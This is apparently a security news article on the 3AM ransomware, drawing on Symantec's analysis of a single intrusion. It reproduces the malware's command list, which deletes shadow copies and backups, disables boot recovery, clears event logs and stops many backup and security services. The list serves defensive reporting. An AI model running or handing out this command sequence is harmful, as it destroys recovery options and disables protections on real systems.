3AM Ransomware Attack – Stop Services & Delete Shadow Copies Before Encrypting

Ransomware is a universal threat to enterprises, targeting anyone handling sensitive data when profit potential is high.

A new ransomware named 3AM has surfaced and is used in a limited manner. Symantec’s Threat Hunter Team witnessed it in a single attack, replacing LockBit when blocked.

3AM is a Rust-written ransomware that is completely unexplored that ceases services, encrypts files and tries to delete VSS copies. However, besides this, its connections to cybercrime groups remain uncertain.

Attack overview

The threat actor’s initial actions included running ‘gpresult’ to extract policy settings, deploying Cobalt Strike components, and attempting privilege escalation with PsExec.

The attackers conducted reconnaissance with the following commands for lateral movement opportunities:-

They established persistence by adding a new user and exfiltrated files using Wput to their FTP server. The attackers initially tried LockBit, but after it was blocked, they turned to 3AM. 

Their use of 3AM was partially successful, as it only infected three out of the organization’s machines, with two of them successfully blocking it.


Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

Ransom note

3AM gets its name from the ‘.threeamtime’ file extension it adds to encrypted files, as referenced in the ransom note.

3AM Ransom Note (Source – Symantec)

Threat researcher Ygor Maximo has recently identified a leaked website belonging to the 3AM ransomware group. The website currently lists six victims who have fallen prey to the group’s notorious activities. This discovery highlights the ever-increasing threat posed by ransomware attacks and serves as a reminder of the importance of robust cybersecurity measures to protect businesses and individuals alike.

This Rust-based ransomware recognizes the following command-line parameters since it’s a 64-bit executable:-

  • “-k”
  • “-p”
  • “-h”
  • “-m”
  • “-s”

The malware tries to run the following commands after its execution, and it mainly targets the security and backup software:-

  • “netsh.exe” advfirewall firewall set rule “group=”Network Discovery”” new enable=Yes
  • “wbadmin.exe” delete systemstatebackup -keepVersions:0 -quiet
  • “wbadmin.exe” DELETE SYSTEMSTATEBACKUP -deleteOldest
  • “bcdedit.exe” /set {default} recoveryenabled No
  • “bcdedit.exe” /set {default} bootstatuspolicy ignoreallfailures
  • “wmic.exe” SHADOWCOPY DELETE /nointeractive
  • “cmd.exe” /c wevtutil cl security
  • “cmd.exe” /c wevtutil cl system
  • “cmd.exe” /c wevtutil cl application
  • “net” stop /y vmcomp
  • “net” stop /y vmwp
  • “net” stop /y veeam
  • “net” stop /y Back
  • “net” stop /y xchange
  • “net” stop /y backup
  • “net” stop /y Backup
  • “net” stop /y acronis
  • “net” stop /y AcronisAgent
  • “net” stop /y AcrSch2Svc
  • “net” stop /y sql
  • “net” stop /y Enterprise
  • “net” stop /y Veeam
  • “net” stop /y VeeamTransportSvc
  • “net” stop /y VeeamNFSSvc
  • “net” stop /y AcrSch
  • “net” stop /y bedbg
  • “net” stop /y DCAgent
  • “net” stop /y EPSecurity
  • “net” stop /y EPUpdate
  • “net” stop /y Eraser
  • “net” stop /y EsgShKernel
  • “net” stop /y FA_Scheduler
  • “net” stop /y IISAdmin
  • “net” stop /y IMAP4
  • “net” stop /y MBAM
  • “net” stop /y Endpoint
  • “net” stop /y Afee
  • “net” stop /y McShield
  • “net” stop /y task
  • “net” stop /y mfemms
  • “net” stop /y mfevtp
  • “net” stop /y mms
  • “net” stop /y MsDts
  • “net” stop /y Exchange
  • “net” stop /y ntrt
  • “net” stop /y PDVF
  • “net” stop /y POP3
  • “net” stop /y Report
  • “net” stop /y RESvc
  • “net” stop /y Monitor
  • “net” stop /y Smcinst
  • “net” stop /y SmcService
  • “net” stop /y SMTP
  • “net” stop /y SNAC
  • “net” stop /y swi_
  • “net” stop /y CCSF
  • “net” stop /y ccEvtMgr
  • “net” stop /y ccSetMgr
  • “net” stop /y TrueKey
  • “net” stop /y tmlisten
  • “net” stop /y UIODetect
  • “net” stop /y W3S
  • “net” stop /y WRSVC
  • “net” stop /y NetMsmq
  • “net” stop /y ekrn
  • “net” stop /y EhttpSrv
  • “net” stop /y ESHASRV
  • “net” stop /y AVP
  • “net” stop /y klnagent
  • “net” stop /y wbengine
  • “net” stop /y KAVF
  • “net” stop /y mfefire
  • “net” stop /y svc$
  • “net” stop /y memtas
  • “net” stop /y mepocs
  • “net” stop /y GxVss
  • “net” stop /y GxCVD
  • “net” stop /y GxBlr
  • “net” stop /y GxFWD
  • “net” stop /y GxCIMgr
  • “net” stop /y BackupExecVSSProvider
  • “net” stop /y BackupExecManagementService
  • “net” stop /y BackupExecJobEngine
  • “net” stop /y BackupExecDiveciMediaService
  • “net” stop /y BackupExecAgentBrowser
  • “net” stop /y BackupExecAgentAccelerator
  • “net” stop /y vss
  • “net” stop /y BacupExecRPCService
  • “net” stop /y CASAD2WebSvc
  • “net” stop /y CAARCUpdateSvc
  • “net” stop /y YooBackup
  • “net” stop /y YooIT

The ransomware scans encrypts matching files, deletes originals, and drops a ‘RECOVER-FILES.txt’ ransom note in each folder. Besides this, the encrypted files have a ‘0x666’ marker followed by ransomware data.

Ransomware affiliates act more independently, with some deploying multiple ransomware strains in one attack. While many new ransomware families fade quickly, 3 AM’s use as a LockBit affiliate fallback hints at potential future relevance for attackers.


IOCs (Source – Symantec)

Keep informed about the latest Cyber Security News by following us on Google NewsLinkedinTwitter, and Facebook.

Guru baran

Recent Posts

BlueNoroff: New Malware Attacking MacOS Users

Researchers have uncovered a new Trojan-attacking macOS user that is associated with the BlueNoroff APT group and their ongoing RustBucket campaign.  As…

2 hours ago

Serpent Stealer Acquires Browser Passwords and Erases Intrusion Logs

Beneath the surface of the cyber realm, a silent menace emerges—crafted with the precision of the .NET framework, the Serpent…

2 hours ago

Doppelgänger: Hackers Employ AI to Launch Highly sophistication Attacks

It has been observed that threat actors are using AI technology to conduct illicit operations on social media platforms. These…

4 hours ago

Kali Linux 2023.4 Released – What’s New!

Kali Linux 2023.4, the latest version of Offensive Security's renowned operating system, has been released, and it includes the advanced…

9 hours ago

Trickbot Malware Developer Pleads Guilty & Faces 35 Years in Prison

A 40-year-old Russian national, Vladimir Dunaev, pleaded guilty for developing and deploying Trickbot malware. Trickbot, a suite of malware tools,…

11 hours ago

ICANN Launches RDRS to Assist Law Enforcement Agencies to Discover Private Info

ICANN is a non-profit organization that is responsible for coordinating the global internet's- DNS IP address allocation This organization manages…

15 hours ago